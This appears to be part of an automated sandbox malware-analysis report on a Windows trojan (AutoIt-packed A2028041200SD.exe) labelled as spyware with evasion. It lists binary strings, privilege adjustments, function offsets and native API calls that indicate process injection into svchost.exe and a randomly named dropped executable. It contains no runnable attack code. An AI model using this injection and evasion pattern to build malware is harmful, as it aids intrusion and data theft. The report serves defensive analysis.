                Source: A2028041200SD.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: A2028041200SD.exe, 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_d8cd57ce-3
                Source: A2028041200SD.exe, 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_46f83975-4
                Source: A2028041200SD.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_1e6c5502-5
                Source: A2028041200SD.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_fd9deeb1-0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024DC403 NtClose,8_2_024DC403
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72B60 NtClose,LdrInitializeThunk,8_2_02F72B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_02F72DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F735C0 NtCreateMutant,LdrInitializeThunk,8_2_02F735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F74340 NtSetContextThread,8_2_02F74340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F74650 NtSuspendThread,8_2_02F74650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72AF0 NtWriteFile,8_2_02F72AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72AD0 NtReadFile,8_2_02F72AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72AB0 NtWaitForSingleObject,8_2_02F72AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72BF0 NtAllocateVirtualMemory,8_2_02F72BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72BE0 NtQueryValueKey,8_2_02F72BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72BA0 NtEnumerateValueKey,8_2_02F72BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72B80 NtQueryInformationFile,8_2_02F72B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72EE0 NtQueueApcThread,8_2_02F72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72EA0 NtAdjustPrivilegesToken,8_2_02F72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72E80 NtReadVirtualMemory,8_2_02F72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72E30 NtWriteVirtualMemory,8_2_02F72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72FE0 NtCreateFile,8_2_02F72FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72FB0 NtResumeThread,8_2_02F72FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72FA0 NtQuerySection,8_2_02F72FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72F90 NtProtectVirtualMemory,8_2_02F72F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72F60 NtCreateProcessEx,8_2_02F72F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72F30 NtCreateSection,8_2_02F72F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72CF0 NtOpenProcess,8_2_02F72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72CC0 NtQueryVirtualMemory,8_2_02F72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72CA0 NtQueryInformationToken,8_2_02F72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72C70 NtFreeVirtualMemory,8_2_02F72C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72C60 NtCreateKey,8_2_02F72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72C00 NtQueryInformationProcess,8_2_02F72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72DD0 NtDelayExecution,8_2_02F72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72DB0 NtEnumerateKey,8_2_02F72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72D30 NtUnmapViewOfSection,8_2_02F72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72D10 NtMapViewOfSection,8_2_02F72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F72D00 NtSetInformationFile,8_2_02F72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F73090 NtSetValueKey,8_2_02F73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F73010 NtOpenDirectoryObject,8_2_02F73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F739B0 NtGetContextThread,8_2_02F739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F73D70 NtOpenThread,8_2_02F73D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F73D10 NtOpenProcessToken,8_2_02F73D10
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_00936685: CreateFileW,DeviceIoControl,CloseHandle,0_2_00936685
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0092AF64 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock,0_2_0092AF64
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_009379D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_009379D3
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0091B0430_2_0091B043
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_009032000_2_00903200
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_00903B700_2_00903B70
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0092410F0_2_0092410F
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_009102A40_2_009102A4
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0092038E0_2_0092038E
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_008FE3B00_2_008FE3B0
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_009106D90_2_009106D9
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0092467F0_2_0092467F
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0095AACE0_2_0095AACE
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_00924BEF0_2_00924BEF
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0091CCC10_2_0091CCC1
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_008F6F070_2_008F6F07
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_008FAF500_2_008FAF50
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0091D1B90_2_0091D1B9
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_009531BC0_2_009531BC
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0090B11F0_2_0090B11F
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0091123A0_2_0091123A
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0092724D0_2_0092724D
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_009313CA0_2_009313CA
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_008F93F00_2_008F93F0
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0090F5630_2_0090F563
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_008F96C00_2_008F96C0
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0093B6CC0_2_0093B6CC
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_008F77B00_2_008F77B0
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0095F7FF0_2_0095F7FF
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_009279C90_2_009279C9
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0090FA570_2_0090FA57
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_008F9B600_2_008F9B60
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_00919ED00_2_00919ED0
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0090FE6F0_2_0090FE6F
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_008F7FA30_2_008F7FA3
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_01277C880_2_01277C88
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024C83B38_2_024C83B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024B12508_2_024B1250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024DEA038_2_024DEA03
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024B42CC8_2_024B42CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024B23F98_2_024B23F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024BFE538_2_024BFE53
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024BDE338_2_024BDE33
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024BDF798_2_024BDF79
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024BDF838_2_024BDF83
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024B2FB08_2_024B2FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024B24008_2_024B2400
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024BFC2A8_2_024BFC2A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024BFC338_2_024BFC33
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024C65B08_2_024C65B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024C65B38_2_024C65B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FC02C08_2_02FC02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FE02748_2_02FE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_030003E68_2_030003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4E3F08_2_02F4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FFA3528_2_02FFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_030001AA8_2_030001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD20008_2_02FD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FF81CC8_2_02FF81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FF41A28_2_02FF41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FC81588_2_02FC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDA1188_2_02FDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F301008_2_02F30100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5C6E08_2_02F5C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3C7C08_2_02F3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F407708_2_02F40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F647508_2_02F64750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FEE4F68_2_02FEE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_030005918_2_03000591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FF24468_2_02FF2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FE44208_2_02FE4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F405358_2_02F40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3EA808_2_02F3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FF6BD78_2_02FF6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FFAB408_2_02FFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F6E8F08_2_02F6E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F268B88_2_02F268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0300A9A68_2_0300A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4A8408_2_02F4A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F428408_2_02F42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F429A08_2_02F429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F569628_2_02F56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FFEEDB8_2_02FFEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F52E908_2_02F52E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FFCE938_2_02FFCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40E598_2_02F40E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FFEE268_2_02FFEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4CFE08_2_02F4CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F32FC88_2_02F32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FBEFA08_2_02FBEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB4F408_2_02FB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F60F308_2_02F60F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FE2F308_2_02FE2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F82F288_2_02F82F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F30CF28_2_02F30CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FE0CB58_2_02FE0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F40C008_2_02F40C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F3ADE08_2_02F3ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F58DBF8_2_02F58DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDCD1F8_2_02FDCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4AD008_2_02F4AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FE12ED8_2_02FE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5B2C08_2_02F5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F452A08_2_02F452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F8739A8_2_02F8739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2D34C8_2_02F2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FF132D8_2_02FF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FF70E98_2_02FF70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FFF0E08_2_02FFF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FEF0CC8_2_02FEF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F470C08_2_02F470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0300B16B8_2_0300B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F4B1B08_2_02F4B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F2F1728_2_02F2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F7516C8_2_02F7516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FF16CC8_2_02FF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F317EC8_2_02F317EC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FFF7B08_2_02FFF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F314608_2_02F31460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FFF43F8_2_02FFF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDD5B08_2_02FDD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FF75718_2_02FF7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FEDAC68_2_02FEDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FDDAAC8_2_02FDDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F85AA08_2_02F85AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FE1AA38_2_02FE1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB3A6C8_2_02FB3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FFFA498_2_02FFFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FF7A468_2_02FF7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB5BF08_2_02FB5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F7DBF98_2_02F7DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5FB808_2_02F5FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FFFB768_2_02FFFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F438E08_2_02F438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FAD8008_2_02FAD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F499508_2_02F49950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5B9508_2_02F5B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FD59108_2_02FD5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F49EB08_2_02F49EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FFFFB18_2_02FFFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F41F928_2_02F41F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FFFF098_2_02FFFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FFFCF28_2_02FFFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FB9C328_2_02FB9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F5FDC08_2_02F5FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FF7D738_2_02FF7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02FF1D5A8_2_02FF1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F43D408_2_02F43D40
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AAB4089_2_04AAB408
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04ACBE889_2_04ACBE88
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AA17519_2_04AA1751
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AAD0AF9_2_04AAD0AF
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AAD0B89_2_04AAD0B8
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AB58389_2_04AB5838
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AAB2B89_2_04AAB2B8
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AAD2D89_2_04AAD2D8
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AB3A389_2_04AB3A38
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AB3A359_2_04AB3A35
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AAB3FE9_2_04AAB3FE
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_080A20089_2_080A2008
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_080A20059_2_080A2005
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_080998889_2_08099888
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_0809B8A89_2_0809B8A8
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_080999CE9_2_080999CE
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_080999D89_2_080999D8
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_080BA4589_2_080BA458
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_0808FD219_2_0808FD21
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_080A3E089_2_080A3E08
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_0809B67F9_2_0809B67F
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_0809B6889_2_0809B688
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_080A07589_2_080A0758
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F87E54 appears 100 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02FBF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F75130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 02F2B970 appears 283 times
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: String function: 00916AC0 appears 42 times
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: String function: 0091F8A0 appears 35 times
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: String function: 0090EC2F appears 68 times
                Source: A2028041200SD.exe, 00000000.00000003.1284104843.0000000003673000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs A2028041200SD.exe
                Source: A2028041200SD.exe, 00000000.00000003.1286483854.000000000386D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs A2028041200SD.exe
                Source: A2028041200SD.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/3@14/11
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0093CE7A GetLastError,FormatMessageW,0_2_0093CE7A
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0092AB84 AdjustTokenPrivileges,CloseHandle,0_2_0092AB84
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0092B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_0092B134
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0093E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0093E1FD
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_00936532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00936532
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0094C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0094C18C
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_008F406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_008F406B
                Source: C:\Users\user\Desktop\A2028041200SD.exeFile created: C:\Users\user\AppData\Local\Temp\aut5BF2.tmpJump to behavior
                Source: A2028041200SD.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
